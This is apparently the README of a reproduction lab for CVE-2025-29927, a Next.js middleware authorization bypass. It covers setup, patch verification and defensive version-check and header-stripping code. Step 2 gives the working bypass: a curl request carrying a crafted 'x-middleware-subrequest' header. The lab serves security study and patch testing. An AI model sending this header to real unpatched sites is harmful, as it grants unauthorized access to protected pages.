# CVE-2025-29927 Lab
Minimal reproduction lab for CVE-2025-29927, the Next.js middleware authorization bypass (CVSS 9.1).
Companion to: [N-Day Analysis writeup on Medium](https://medium.com/@swapjam)
## What this is
A Next.js 15.2.2 app (vulnerable) with a cookie-gated `/dashboard` route. The middleware auth check can be bypassed by sending a single HTTP header; no credentials are required.
## Requirements
- Node.js 18+
## Setup
```bash
git clone https://github.com/SwapnilDeshpande/cve-2025-29927-lab
cd cve-2025-29927-lab
npm install # pins to Next.js 15.2.2 (vulnerable)
npm run dev -- --port 3001
```
## Reproduce the bypass
**Step 1 - Confirm middleware blocks unauthenticated requests:**
```bash
curl -s -o /dev/null -w "%{http_code}" http://localhost:3001/dashboard
# → 307
```
**Step 2 - Bypass middleware with the subrequest header:**
```bash
curl -s -o /dev/null -w "%{http_code}" \
  -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://localhost:3001/dashboard
# → 200
```
**Step 3 - Upgrade to the patched version and confirm the bypass is blocked:**
```bash
npm install next@15.2.3
# Restart the dev server, then repeat Step 2
# → 307
```
## App routes
| Route | Access |
|---|---|
| `/` | Public |
| `/login` | Public |
| `/dashboard` | Protected by middleware (requires `session` cookie) |
## Affected versions
Next.js < 15.2.3, < 14.2.25, < 13.5.9, < 12.3.5
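
For defenders, the version list above and the header from Step 2 can be turned into two checks. This is an added example, not code from the lab repository: `isAffected` and `sanitizeHeaders` are hypothetical helper names, and the treatment of release lines outside 12 to 15 is an assumption marked in the comments.

```javascript
// Added example: not part of the lab repository.
// First patched release per release line, from "Affected versions" above.
const FIXED = { 15: [15, 2, 3], 14: [14, 2, 25], 13: [13, 5, 9], 12: [12, 3, 5] };
const SUBREQUEST_HEADER = "x-middleware-subrequest";

// Parse "15.2.2" or "v15.2.2" into [major, minor, patch].
function parseVersion(version) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(version).trim());
  if (!m) throw new Error(`unparseable version: ${version}`);
  return m.slice(1, 4).map(Number);
}

// True when the version is below the patched release of its line.
function isAffected(version) {
  const v = parseVersion(version);
  const fixed = FIXED[v[0]];
  // Assumption: lines older than 12 have no patched release listed on this
  // page, so they count as affected; majors newer than 15 count as patched.
  if (!fixed) return v[0] < 12;
  for (let i = 0; i < 3; i++) {
    if (v[i] !== fixed[i]) return v[i] < fixed[i];
  }
  return false; // exactly the patched release
}

// Proxy-side mitigation: drop the internal header from inbound requests.
// Header names are case-insensitive; `stripped` lets the caller log the hit.
function sanitizeHeaders(headers) {
  const clean = {};
  let stripped = false;
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() === SUBREQUEST_HEADER) {
      stripped = true;
      continue;
    }
    clean[name] = value;
  }
  return { clean, stripped };
}

// Constructed sample input.
console.log(isAffected("15.2.2"), isAffected("15.2.3"));
console.log(sanitizeHeaders({ "X-Middleware-Subrequest": "middleware", cookie: "session=abc" }));
```

Pass `isAffected` the `version` field from `node_modules/next/package.json` so the check reflects the installed release rather than the range declared in the project's own `package.json`.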
## References
- [NVD - CVE-2025-29927](https://nvd.nist.gov/vuln/detail/CVE-2025-29927)
- [Next.js patch PR #77201](https://github.com/vercel/next.js/pull/77201)
- [Vulnerable source - sandbox.ts](https://github.com/vercel/next.js/blob/v15.2.0/packages/next/src/server/web/sandbox/sandbox.ts)